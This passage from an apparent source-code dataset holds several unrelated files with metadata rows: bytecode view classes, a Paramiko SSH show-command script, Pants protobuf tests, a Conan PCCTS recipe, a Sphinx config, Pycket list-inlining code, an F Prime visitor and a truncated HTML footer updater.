            bytes_per_item = 1
            store_code = bytecode.GlobalStoreU8
            load_code = bytecode.GlobalLoadU8
            def store_initial_value(self, list):
                if self.init is not None:
                    for (i, v) in enumerate(self.init):
                        list[self.pos + i] = v % 256
        class ArrayView16(ArrayView):
            bytes_per_item = 2
            store_code = bytecode.GlobalStore16
            load_code = bytecode.GlobalLoad16
            def store_initial_value(self, list):
                if self.init is not None:
                    for (i, v) in enumerate(self.init):
                        a, b = divmod(v, 0x100)
                        a = a % 0x100
                        list[self.pos + 2*i:self.pos + 2*i + 2] = a, b
        # Maps attribute names used in EVM source to their view factories.
        accessor_types = {
            'int8s': SingleView8s,
            'int8u': SingleView8u,
            'int16': SingleView16,
            'array8s': ArrayView8s,
            'array8u': ArrayView8u,
            'array16': ArrayView16,
        }
| 42.02681 | 174 | 0.587459 |
f1f2c7e9ef1a554f5e2227a10d8232e4894e6d98 | 645 | py | Python | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | 5 | 2021-06-11T11:24:04.000Z | 2022-03-22T03:22:57.000Z | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | null | null | null | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | 10 | 2021-04-18T12:31:14.000Z | 2022-03-28T07:21:16.000Z | import time
from paramiko.client import SSHClient
# Credentials here are for an always-on Sandbox from Cisco DevNet
SSH_USER = "<Insert user>"
SSH_PASSWORD = "<insert password>"
SSH_HOST = "<insert host>"
SSH_PORT = 22 # Change this if your SSH port is different

client = SSHClient()
client.load_system_host_keys()
client.connect(SSH_HOST, port=SSH_PORT,
               username=SSH_USER,
               password=SSH_PASSWORD,
               look_for_keys=False)

CMD = "show ip interface brief" # You can issue any command you want
try:
    # exec_command() returns immediately; reading stdout blocks until the
    # remote command finishes, so no fixed-length sleep is needed and the
    # command output is no longer silently discarded.
    stdin, stdout, stderr = client.exec_command(CMD)
    print(stdout.read().decode())
    errors = stderr.read().decode()
    if errors:
        print(errors)
finally:
    # Always release the SSH connection, even if reading fails.
    client.close()
| 26.875 | 68 | 0.682171 |
ff4c17f0d7da699cd84ade4dbaebf62030f8ea3a | 12,740 | py | Python | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import re
from collections import OrderedDict
from textwrap import dedent
from twitter.common.collections import OrderedSet
from pants.backend.codegen.register import build_file_aliases as register_codegen
from pants.backend.codegen.tasks.protobuf_gen import (ProtobufGen, _same_contents,
check_duplicate_conflicting_protos)
from pants.backend.core.register import build_file_aliases as register_core
from pants.base.validation import assert_list
from pants.util.contextutil import temporary_file
from pants.util.dirutil import safe_mkdir
from pants_test.tasks.task_test_base import TaskTestBase
class ProtobufGenTest(TaskTestBase):
  """Unit tests for the ProtobufGen task: generated-file name calculation,
  duplicate/conflicting .proto detection, source calculation, and default
  Java dependencies."""
  def setUp(self):
    super(ProtobufGenTest, self).setUp()
    self.set_options(pants_bootstrapdir='~/.cache/pants',
                     max_subprocess_args=100,
                     pants_support_fetch_timeout_secs=1,
                     pants_support_baseurls=['http://example.com/dummy_base_url'])
  @classmethod
  def task_type(cls):
    return ProtobufGen
  @property
  def alias_groups(self):
    return register_core().merge(register_codegen())
  def assert_files(self, task, rel_path, contents, expected_files):
    # Writes `contents` to a temp file and checks the task predicts exactly
    # `expected_files` as its generated outputs.
    assert_list(expected_files)
    with temporary_file() as fp:
      fp.write(contents)
      fp.close()
      self.assertEqual(set(expected_files), set(task.calculate_genfiles(fp.name, rel_path)))
  def assert_java_files(self, task, rel_path, contents, expected_files):
    self.assert_files(task, rel_path, contents, expected_files)
  def test_plain(self):
    task = self.create_task(self.context())
    self.assert_java_files(
      task,
      'snake_case.proto',
      'package com.twitter.ads.revenue_tables;',
      ['com/twitter/ads/revenue_tables/SnakeCase.java'])
    self.assert_java_files(
      task,
      'a/b/jake.proto',
      'package com.twitter.ads.revenue_tables;',
      ['com/twitter/ads/revenue_tables/Jake.java'])
  def test_custom_package(self):
    task = self.create_task(self.context())
    self.assert_java_files(
      task,
      'fred.proto',
      """
      package com.twitter.ads.revenue_tables;
      option java_package = "com.example.foo.bar";
      """,
      ['com/example/foo/bar/Fred.java'])
    self.assert_java_files(
      task,
      'bam_bam.proto',
      'option java_package = "com.example.baz.bip";',
      ['com/example/baz/bip/BamBam.java'])
    self.assert_java_files(
      task,
      'bam_bam.proto',
      'option java_package="com.example.baz.bip" ;',
      ['com/example/baz/bip/BamBam.java'])
    self.assert_java_files(
      task,
      'fred.proto',
      """
      option java_package = "com.example.foo.bar";
      package com.twitter.ads.revenue_tables;
      """,
      ['com/example/foo/bar/Fred.java'])
  def test_custom_outer(self):
    task = self.create_task(self.context())
    self.assert_java_files(
      task,
      'jack_spratt.proto',
      """
      package com.twitter.lean;
      option java_outer_classname = "To";
      """,
      ['com/twitter/lean/To.java'])
  def test_multiple_files(self):
    task = self.create_task(self.context())
    self.assert_java_files(
      task,
      'jack_spratt.proto',
      """
      package com.twitter.lean;
      option java_multiple_files = false;
      """,
      ['com/twitter/lean/JackSpratt.java'])
    self.assert_java_files(
      task,
      'jack_spratt_no_whitespace.proto',
      """
      package com.twitter.lean;
      option java_multiple_files = true;
      enum Jake { FOO=1;}
      message joe_bob {}
      """,
      ['com/twitter/lean/Jake.java',
       'com/twitter/lean/joe_bob.java',
       'com/twitter/lean/joe_bobOrBuilder.java',
       'com/twitter/lean/JackSprattNoWhitespace.java'])
    self.assert_java_files(
      task,
      'inner_class.proto',
      """
      package org.pantsbuild.protos;
      option java_multiple_files = true;
      message Foo {
        enum Bar {
          BAZ = 0;
        }
      }
      """,
      ['org/pantsbuild/protos/InnerClass.java',
       'org/pantsbuild/protos/Foo.java',
       'org/pantsbuild/protos/FooOrBuilder.java'])
    self.assert_java_files(
      task,
      'Camel-case.proto',
      """
      package pants.preferences;
      option java_package = "org.pantsbuild.protos.preferences";
      """,
      ['org/pantsbuild/protos/preferences/CamelCase.java'])
    self.assert_java_files(
      task,
      'curly_braces.proto',
      """
      package pants.preferences;
      option java_package = "org.pantsbuild.protos.preferences";
      option java_multiple_files = true;
      message Wat { message Inner { option meh = true; }
        option Inner field = 1;
      }
      service SomeService { rpc AndAnother() {} }
      """,
      ['org/pantsbuild/protos/preferences/CurlyBraces.java',
       'org/pantsbuild/protos/preferences/SomeService.java',
       'org/pantsbuild/protos/preferences/Wat.java',
       'org/pantsbuild/protos/preferences/WatOrBuilder.java'])
    self.assert_java_files(
      task,
      'pants.proto',
      """
      package pants.preferences;
      option java_multiple_files = true;
      option java_package = "org.pantsbuild.protos.preferences";
      message AnotherMessage {
        BAZ = 0;
      }
      service SomeService {
        rpc SomeRpc();
        rpc AnotherRpc() {
        }
        rpc AndAnother() {}
      }
      message MessageAfterService {
        MEH = 0;
      }
      """,
      ['org/pantsbuild/protos/preferences/Pants.java',
       'org/pantsbuild/protos/preferences/AnotherMessage.java',
       'org/pantsbuild/protos/preferences/AnotherMessageOrBuilder.java',
       'org/pantsbuild/protos/preferences/SomeService.java',
       'org/pantsbuild/protos/preferences/MessageAfterService.java',
       'org/pantsbuild/protos/preferences/MessageAfterServiceOrBuilder.java'])
  def test_same_contents(self):
    dup1 = self.create_file('src/dup1.proto', dedent("""
      package com.twitter.lean;
      option java_multiple_files = true;
      enum Jake { FOO=1;}
      message joe_bob {}
    """))
    dup2 = self.create_file('src/dup2.proto', dedent("""
      package com.twitter.lean;
      option java_multiple_files = true;
      enum Jake { FOO=1;}
      message joe_bob {}
    """))
    self.assertTrue(_same_contents(dup1, dup2))
  def test_not_same_contents(self):
    dup1 = self.create_file('src/dup1.proto', dedent("""
      package com.twitter.lean;
      option java_multiple_files = true;
      enum Jake { FOO=1;}
      message joe_bob {}
    """))
    dup2 = self.create_file('src/dup2.proto', dedent("""
      package com.twitter.lean;
      message joe_bob {}
    """))
    self.assertFalse(_same_contents(dup1, dup2))
  def test_protos_extracted_under_build_root(self):
    """This testcase shows that you can put sources for protos outside the directory where the
    BUILD file is defined. This will be the case for .proto files that have been extracted
    under .pants.d.
    """
    # place a .proto file in a place outside of where the BUILD file is defined
    extracted_source_path = os.path.join(self.build_root, 'extracted', 'src', 'proto')
    safe_mkdir(os.path.join(extracted_source_path, 'sample-package'))
    sample_proto_path = os.path.join(extracted_source_path, 'sample-package', 'sample.proto')
    with open(sample_proto_path, 'w') as sample_proto:
      sample_proto.write(dedent("""
        package com.example;
        message sample {}
      """))
    self.add_to_build_file('sample', dedent("""
      java_protobuf_library(name='sample',
        sources=['{sample_proto_path}'],
      )""").format(sample_proto_path=sample_proto_path))
    target = self.target("sample:sample")
    context = self.context(target_roots=[target])
    task = self.create_task(context=context)
    sources_by_base = task._calculate_sources([target])
    self.assertEquals(['extracted/src/proto'], sources_by_base.keys())
    self.assertEquals(OrderedSet([sample_proto_path]), sources_by_base['extracted/src/proto'])
  def test_default_javadeps(self):
    self.create_file(relpath='test_proto/test.proto', contents=dedent("""
      package com.example.test_proto;
      enum Foo { foo=1;}
      message Bar {}
    """))
    self.add_to_build_file('test_proto', dedent("""
      java_protobuf_library(name='proto',
        sources=['test.proto'],
        dependencies=[]
      )
    """))
    self.add_to_build_file('3rdparty', dedent("""
      target(name='protobuf-java')
    """))
    context = self.context(target_roots=[self.target('test_proto:proto')])
    task = self.create_task(context)
    javadeps = task.javadeps
    self.assertEquals(len(javadeps), 1)
    self.assertEquals('protobuf-java', javadeps.pop().name)
  def test_calculate_sources(self):
    self.add_to_build_file('proto-lib', dedent("""
      java_protobuf_library(name='proto-target',
        sources=['foo.proto'],
      )
    """))
    target = self.target('proto-lib:proto-target')
    context = self.context(target_roots=[target])
    task = self.create_task(context)
    result = task._calculate_sources([target])
    self.assertEquals(1, len(result.keys()))
    self.assertEquals(OrderedSet(['proto-lib/foo.proto']), result['proto-lib'])
  def test_calculate_sources_with_source_root(self):
    self.add_to_build_file('project/src/main/proto/proto-lib', dedent("""
      java_protobuf_library(name='proto-target',
        sources=['foo.proto'],
      )
    """))
    target = self.target('project/src/main/proto/proto-lib:proto-target')
    context = self.context(target_roots=[target])
    task = self.create_task(context)
    result = task._calculate_sources([target])
    self.assertEquals(1, len(result.keys()))
    self.assertEquals(OrderedSet(['project/src/main/proto/proto-lib/foo.proto']), result['project/src/main/proto'])
  class MockLogger(object):
    """Captures warn/error messages so tests can assert on logger output."""
    def __init__(self):
      self._warn = []
      self._error = []
    def warn(self, msg):
      self._warn.append(msg)
    def error(self, msg):
      self._error.append(msg)
  def test_check_duplicate_conflicting_protos_warn(self):
    file1 = self.create_file('src1/foo.proto', dedent("""
      package com.example.test_proto;
      message Foo{}
    """))
    # Create an identical .proto file in a different directory
    file2 = self.create_file('src2/foo.proto', dedent("""
      package com.example.test_proto;
      message Foo{}
    """))
    task = self.create_task(self.context())
    test_logger = self.MockLogger()
    sources_by_base = OrderedDict()
    sources_by_base[os.path.join(self.build_root, 'src1')] = [file1]
    sources_by_base[os.path.join(self.build_root, 'src2')] = [file2]
    check_duplicate_conflicting_protos(task, sources_by_base, [file1, file2], test_logger)
    self.assertEquals(2, len(test_logger._warn), '\n'.join([re.sub('\\n', '\\\\n', s) for s in test_logger._warn]))
    self.assertRegexpMatches(test_logger._warn[0], '^Proto duplication detected.*\n.*src1/foo.proto\n.*src2/foo.proto')
    self.assertRegexpMatches(test_logger._warn[1], 'Arbitrarily favoring proto 1')
    self.assertEquals([], test_logger._error)
  def test_check_duplicate_conflicting_protos_error(self):
    file1 = self.create_file('src1/foo.proto', dedent("""
      package com.example.test_proto;
      message Foo{value=1;}
    """))
    # Create an .proto file in a different directory that has a different definition
    file2 = self.create_file('src2/foo.proto', dedent("""
      package com.example.test_proto;
      message Foo{}
    """))
    task = self.create_task(self.context())
    test_logger = self.MockLogger()
    sources_by_base = OrderedDict()
    sources_by_base[os.path.join(self.build_root, 'src1')] = [file1]
    sources_by_base[os.path.join(self.build_root, 'src2')] = [file2]
    check_duplicate_conflicting_protos(task, sources_by_base, [file1, file2], test_logger)
    self.assertEquals(1, len(test_logger._warn))
    self.assertRegexpMatches(test_logger._warn[0], 'Arbitrarily favoring proto 1')
    self.assertEquals(1, len(test_logger._error))
    self.assertRegexpMatches(test_logger._error[0], '^Proto conflict detected.*\n.*src1/foo.proto\n.*src2/foo.proto')
7922abf0fad9d4030ee7bd40e11c9d852a611b37 | 1,993 | py | Python | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | import os, shutil
from conans import ConanFile, tools
class PcctsConan(ConanFile):
    """Conan recipe that downloads and builds the PCCTS toolkit (ANTLR 1.x /
    DLG / SORCERER) from polhode.com and packages its headers and binaries."""
    name = "pccts"
    version = "1.33MR33"
    settings = "os_build", "compiler", "arch_build"
    generators = "gcc"
    description = "PCCTS toolkit"
    license = "public domain"
    url = "https://github.com/db4/conan-pccts"
    def build(self):
        # Windows uses a prebuilt archive; other platforms build from source.
        if self.settings.os_build == "Windows":
            tools.get("http://www.polhode.com/win32.zip", sha1="db910f4397b2f77a58980e9ab3ba2603c42ba50e")
        else:
            tools.get("http://www.polhode.com/pccts133mr.zip", sha1="5b3417efd5f537434b568114bcda853b4975d851")
        if tools.cross_building(self.settings):
            # When cross-compiling, first build native (host) antlr/dlg tools
            # in a copy of the tree, then point the sorcerer makefile at them.
            shutil.copytree("pccts", "pccts-host")
            self.run("cd pccts-host && make COPT=-DPCCTS_USE_STDARG")
            tools.replace_in_file("pccts/sorcerer/makefile", "$(BIN)/antlr", "../../pccts-host/bin/antlr")
            tools.replace_in_file("pccts/sorcerer/makefile", "$(BIN)/dlg", "../../pccts-host/bin/dlg")
        # genmk's makefile drops COPT from its compile line; patch it back in.
        tools.replace_in_file("pccts/support/genmk/makefile", "$(CC) -o", "$(CC) $(COPT) -o")
        # Build with the Conan-generated gcc flags file injected via @file.
        self.run("cd pccts && make CC=\"gcc @{0}\" COPT=-DPCCTS_USE_STDARG".format(
            os.path.join(self.build_folder, "conanbuildinfo.gcc")))
    def package(self):
        # The license text lives inside antlr.h's header comment; extract it.
        tmp = tools.load("pccts/h/antlr.h")
        license_contents = tmp[tmp.find(" * SOFTWARE RIGHTS"):tmp.find("*/")]
        tools.save("LICENSE", license_contents)
        self.copy("LICENSE")
        self.copy("*.h", dst="include", src="pccts/h")
        self.copy("*.cpp", dst="include", src="pccts/h")
        self.copy("*", dst="bin", src="pccts/bin", excludes="*.txt")
    def package_info(self):
        # Expose the packaged antlr/dlg/sorcerer binaries on consumers' PATH.
        self.env_info.path.append(os.path.join(self.package_folder, "bin"))
    def package_id(self):
        self.info.include_build_settings()
        # The Windows package is a prebuilt download, so it is independent of
        # the build machine's architecture and compiler.
        if self.info.settings.os_build == "Windows":
            del self.info.settings.arch_build
            del self.info.settings.compiler
9f2218ed95c32990f1e40540f92062fcd256fb81 | 673 | py | Python | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Sphinx configuration for the sphinxcontrib-ros documentation build.
import os
import sys
import sphinx_rtd_theme

# Make the in-tree sources importable so the `sphinxcontrib.ros` extension
# below resolves to the local checkout rather than an installed copy.
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'src'))
# NOTE(review): the bare built-in `reload` exists only on Python 2; a
# Python 3 port needs importlib.reload. The forced reload presumably
# refreshes the sphinxcontrib namespace package after the path insertion
# above -- confirm before porting.
import sphinxcontrib; reload(sphinxcontrib)

extensions = ['sphinxcontrib.ros']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'

# Project metadata shown in the rendered documentation.
# Fix: the project name was misspelled 'sphinxcontritb-ros'.
project = u'sphinxcontrib-ros'
copyright = u'2015, otamachan'
version = '0.1.0'
release = '0.1.0'

exclude_patterns = ['_build']
pygments_style = 'sphinx'

# Use the Read the Docs theme.
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
def setup(app):
    """Sphinx extension hook: register the `confval` object type used to
    document configuration values (the markup Sphinx uses for its own docs).
    """
    # NOTE(review): add_description_unit is the legacy API name; newer
    # Sphinx releases call this add_object_type -- confirm the targeted
    # Sphinx version before upgrading.
    app.add_description_unit('confval', 'confval',
                             'pair: %s; configuration value')
| 29.26087 | 72 | 0.702823 |
d0768d0ca0c17922d391894b0a409b453b80a7f3 | 10,153 | py | Python | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | from pycket import config
from rpython.rlib import jit, debug, objectmodel
def inline_small_list(sizemax=11, sizemin=0, immutable=False, attrname="list", factoryname="make", unbox_num=False):
"""
This function is helpful if you have a class with a field storing a
list and the list is often very small. Calling this function will inline
the list into instances for the small sizes. This works by adding the
following methods to the class:
_get_list(self, i): return ith element of the list
_set_list(self, i, val): set ith element of the list
_get_full_list(self): returns a copy of the full list
@staticmethod
make(listcontent, *args): makes a new instance with the list's content set to listcontent
"""
if not config.type_size_specialization:
sizemin = sizemax = 0
unbox_num = False
def wrapper(cls):
from rpython.rlib.unroll import unrolling_iterable
classes = []
def make_methods(size):
attrs = ["_%s_%s" % (attrname, i) for i in range(size)]
unrolling_enumerate_attrs = unrolling_iterable(enumerate(attrs))
def _get_size_list(self):
return size
def _get_list(self, i):
for j, attr in unrolling_enumerate_attrs:
if j == i:
return getattr(self, attr)
raise IndexError
def _get_full_list(self):
res = [None] * size
for i, attr in unrolling_enumerate_attrs:
res[i] = getattr(self, attr)
return res
def _set_list(self, i, val):
for j, attr in unrolling_enumerate_attrs:
if j == i:
setattr(self, attr, val)
return
raise IndexError
def _init(self, elems, *args):
assert len(elems) == size
for i, attr in unrolling_enumerate_attrs:
setattr(self, attr, elems[i])
cls.__init__(self, *args)
meths = {"_get_list": _get_list, "_get_size_list": _get_size_list, "_get_full_list": _get_full_list, "_set_list": _set_list, "__init__" : _init}
if immutable:
meths["_immutable_fields_"] = attrs
return meths
classes = [type(cls)("%sSize%s" % (cls.__name__, size), (cls, ), make_methods(size)) for size in range(sizemin, sizemax)]
def _get_arbitrary(self, i):
return getattr(self, attrname)[i]
def _get_size_list_arbitrary(self):
return len(getattr(self, attrname))
def _get_list_arbitrary(self):
return getattr(self, attrname)
def _set_arbitrary(self, i, val):
getattr(self, attrname)[i] = val
def _init(self, elems, *args):
debug.make_sure_not_resized(elems)
setattr(self, attrname, elems)
cls.__init__(self, *args)
meths = {"_get_list": _get_arbitrary, "_get_size_list": _get_size_list_arbitrary, "_get_full_list": _get_list_arbitrary, "_set_list": _set_arbitrary, "__init__": _init}
if immutable:
meths["_immutable_fields_"] = ["%s[*]" % (attrname, )]
cls_arbitrary = type(cls)("%sArbitrary" % cls.__name__, (cls, ), meths)
def make(elems, *args):
if classes:
if (elems is None or len(elems) == 0):
return make0(*args)
else:
if elems is None:
elems = []
if sizemin <= len(elems) < sizemax:
cls = classes[len(elems) - sizemin]
else:
cls = cls_arbitrary
return cls(elems, *args)
# XXX those could be done more nicely
def make0(*args):
if not classes: # no type specialization
return make([], *args)
result = objectmodel.instantiate(classes[0])
cls.__init__(result, *args)
return result
def make1(elem, *args):
if not classes: # no type specialization
return make([elem], *args)
result = objectmodel.instantiate(classes[1])
result._set_list(0, elem)
cls.__init__(result, *args)
return result
def make2(elem1, elem2, *args):
if not classes: # no type specialization
return make([elem1, elem2], *args)
result = objectmodel.instantiate(classes[2])
result._set_list(0, elem1)
result._set_list(1, elem2)
cls.__init__(result, *args)
return result
def make_n(size, *args):
if sizemin <= size < sizemax:
subcls = classes[size - sizemin]
else:
subcls = cls_arbitrary
result = objectmodel.instantiate(subcls)
if subcls is cls_arbitrary:
assert isinstance(result, subcls)
setattr(result, attrname, [None] * size)
cls.__init__(result, *args)
return result
if unbox_num:
make, make1, make2 = _add_num_classes(cls, make, make0, make1, make2)
setattr(cls, factoryname, staticmethod(make))
setattr(cls, factoryname + "0", staticmethod(make0))
setattr(cls, factoryname + "1", staticmethod(make1))
setattr(cls, factoryname + "2", staticmethod(make2))
setattr(cls, factoryname + "_n", staticmethod(make_n))
return cls
return wrapper
def _add_num_classes(cls, orig_make, orig_make0, orig_make1, orig_make2):
    """Wrap the list factories so small fixnum/flonum contents are unboxed.

    Returns replacement ``(make, make1, make2)`` factories that, for lists
    of length 1 or 2 whose elements are W_Fixnum (or, for length 1,
    W_Flonum), pick a generated subclass storing the raw machine value(s)
    instead of boxed objects.  The generated Size* subclasses rebox the
    values on access and are read-only (``_set_list`` raises).
    """
    # XXX quite brute force
    def make(vals, *args):
        from pycket.values import W_Fixnum
        if vals is None or len(vals) == 0:
            return orig_make0(*args)
        if len(vals) == 1:
            return make1(vals[0], *args)
        if len(vals) == 2:
            return make2(vals[0], vals[1], *args)
        return orig_make(vals, *args)
    def make1(w_a, *args):
        from pycket.values import W_Fixnum, W_Flonum
        if isinstance(w_a, W_Fixnum):
            return Size1Fixed(w_a.value, *args)
        if isinstance(w_a, W_Flonum):
            return Size1Flo(w_a.value, *args)
        return orig_make1(w_a, *args)
    def make2(w_a, w_b, *args):
        from pycket.values import W_Fixnum
        # Only fixnums are unboxed in the two-element case; the class-name
        # suffix encodes which slots are unboxed (1) or boxed (0).
        if isinstance(w_a, W_Fixnum):
            if isinstance(w_b, W_Fixnum):
                return Size2Fixed11(w_a.value, w_b.value, *args)
            else:
                return Size2Fixed10(w_a.value, w_b, *args)
        elif isinstance(w_b, W_Fixnum):
            return Size2Fixed01(w_a, w_b.value, *args)
        return orig_make2(w_a, w_b, *args)
    class Size1Fixed(cls):
        # One element, unboxed fixnum.
        def __init__(self, vals_fixed_0, *args):
            self.vals_fixed_0 = vals_fixed_0
            cls.__init__(self, *args)
        def _get_size_list(self):
            return 1
        def _get_full_list(self):
            return [self._get_list(0)]
        def _get_list(self, i):
            from pycket.values import W_Fixnum
            assert i == 0
            return W_Fixnum(self.vals_fixed_0)
        def _set_list(self, i, val):
            raise NotImplementedError()
    Size1Fixed.__name__ = cls.__name__ + Size1Fixed.__name__
    class Size1Flo(cls):
        # One element, unboxed flonum.
        def __init__(self, vals_flo_0, *args):
            self.vals_flo_0 = vals_flo_0
            cls.__init__(self, *args)
        def _get_size_list(self):
            return 1
        def _get_full_list(self):
            return [self._get_list(0)]
        def _get_list(self, i):
            from pycket.values import W_Flonum
            assert i == 0
            return W_Flonum(self.vals_flo_0)
        def _set_list(self, i, val):
            raise NotImplementedError()
    Size1Flo.__name__ = cls.__name__ + Size1Flo.__name__
    class Size2Fixed10(cls):
        # Two elements: slot 0 unboxed fixnum, slot 1 boxed.
        def __init__(self, vals_fixed_0, w_val1, *args):
            self.vals_fixed_0 = vals_fixed_0
            self.w_val1 = w_val1
            cls.__init__(self, *args)
        def _get_size_list(self):
            return 2
        def _get_full_list(self):
            return [self._get_list(0), self._get_list(1)]
        def _get_list(self, i):
            from pycket.values import W_Fixnum
            if i == 0:
                return W_Fixnum(self.vals_fixed_0)
            else:
                assert i == 1
                return self.w_val1
        def _set_list(self, i, val):
            raise NotImplementedError()
    Size2Fixed10.__name__ = cls.__name__ + Size2Fixed10.__name__
    class Size2Fixed01(cls):
        # Two elements: slot 0 boxed, slot 1 unboxed fixnum.
        def __init__(self, w_val0, vals_fixed_1, *args):
            self.w_val0 = w_val0
            self.vals_fixed_1 = vals_fixed_1
            cls.__init__(self, *args)
        def _get_size_list(self):
            return 2
        def _get_full_list(self):
            return [self._get_list(0), self._get_list(1)]
        def _get_list(self, i):
            from pycket.values import W_Fixnum
            if i == 0:
                return self.w_val0
            else:
                assert i == 1
                return W_Fixnum(self.vals_fixed_1)
        def _set_list(self, i, val):
            raise NotImplementedError()
    Size2Fixed01.__name__ = cls.__name__ + Size2Fixed01.__name__
    class Size2Fixed11(cls):
        # Two elements, both unboxed fixnums.
        def __init__(self, vals_fixed_0, vals_fixed_1, *args):
            self.vals_fixed_0 = vals_fixed_0
            self.vals_fixed_1 = vals_fixed_1
            cls.__init__(self, *args)
        def _get_size_list(self):
            return 2
        def _get_full_list(self):
            return [self._get_list(0), self._get_list(1)]
        def _get_list(self, i):
            from pycket.values import W_Fixnum
            if i == 0:
                return W_Fixnum(self.vals_fixed_0)
            else:
                assert i == 1
                return W_Fixnum(self.vals_fixed_1)
        def _set_list(self, i, val):
            raise NotImplementedError()
    Size2Fixed11.__name__ = cls.__name__ + Size2Fixed11.__name__
    return make, make1, make2
| 36.786232 | 176 | 0.571161 |
a48eb9f199eadbd142322d72558b67621c83bfb1 | 815 | py | Python | Autocoders/src/generators/visitors/TestImplVisitorBase.py | lydiaxing/fprime | f6b3e03f89e9aca1614243c9896d4a72aa0cc726 | [
"Apache-2.0"
] | 2 | 2020-09-08T05:39:05.000Z | 2021-05-04T14:58:51.000Z | Autocoders/src/generators/visitors/TestImplVisitorBase.py | JPLOpenSource/fprime-sw-Rel1.0 | 18364596c24fa369c938ef8758e5aa945ecc6a9b | [
"Apache-2.0"
] | 2 | 2019-02-27T03:17:15.000Z | 2019-03-01T22:34:30.000Z | Autocoders/src/generators/visitors/TestImplVisitorBase.py | JPLOpenSource/fprime-sw-Rel1.0 | 18364596c24fa369c938ef8758e5aa945ecc6a9b | [
"Apache-2.0"
] | 3 | 2019-02-17T20:41:15.000Z | 2019-02-26T21:06:50.000Z | #!/bin/env python
#===============================================================================
# NAME: TestImplVisitorBase.py
#
# DESCRIPTION: A base class for TestImpl visitors
#
# AUTHOR: bocchino
# EMAIL: bocchino@jpl.nasa.gov
# DATE CREATED: November 14, 2015
#
# Copyright 2015, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
#===============================================================================
from generators.visitors import ComponentVisitorBase
class TestImplVisitorBase(ComponentVisitorBase.ComponentVisitorBase):
    """Common base class for visitors that generate TestImpl code."""

    def initTestImpl(self, obj, c):
        """Initialize the visitor and derive the generated base-class names."""
        self.init(obj, c)
        component = c.name()
        c.component_base = "%sComponentBase" % component
        c.gtest_base = "%sGTestBase" % component
bbda033865b84a73a0af11697d73ea7efe95b4be | 1,234 | py | Python | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | 1 | 2020-05-30T14:24:22.000Z | 2020-05-30T14:24:22.000Z | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | 1 | 2021-03-15T06:18:03.000Z | 2021-03-15T06:18:03.000Z | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | null | null | null | import os
from pages import pagelist
# Marker comments in each HTML page that delimit the auto-generated footer
# region; updatePage() rewrites everything between them.
startComment = "START AUTO-INSERT FOOTER"
endComment = "END AUTO-INSERT FOOTER"
# Scratch file holding the footer markup to splice in.
# NOTE(review): this name shadows the stdlib `tempfile` module -- worth
# renaming if this script ever needs that module.
tempfile = 'nav.temp'
def updatePage(page=None):
    """Replace the auto-insert footer region of an HTML page.

    The lines between the line containing ``startComment`` and the line
    containing ``endComment`` (both marker lines are kept) are replaced
    with the contents of the scratch file ``tempfile``. A blank line is
    emitted before the end marker, matching the original output format.

    page: path of the HTML file to rewrite. Defaults to the module-level
        ``pageToChange`` global for backward compatibility with the
        original call sites, which set that global in a loop.
    """
    if page is None:
        page = pageToChange  # legacy implicit-global calling convention
    with open(page, 'r') as src:
        original_lines = src.readlines()
    # Hoisted out of the line loop: the footer is invariant per call.
    with open(tempfile, 'r') as temp:
        footer = temp.read()
    with open(page, 'w') as dst:
        copying = True
        for line in original_lines:
            if endComment in line:
                # Resume copying; blank line keeps the original spacing.
                copying = True
                dst.write('\n')
            if copying:
                dst.write(line)
            if startComment in line:
                # Splice in the fresh footer, then skip the stale one.
                dst.write(footer)
                copying = False
# Write the footer markup into the scratch file; updatePage() splices it in
# right after the start marker of every page.
with open(tempfile, 'w') as f:
    f.write('''
<footer id="footer">
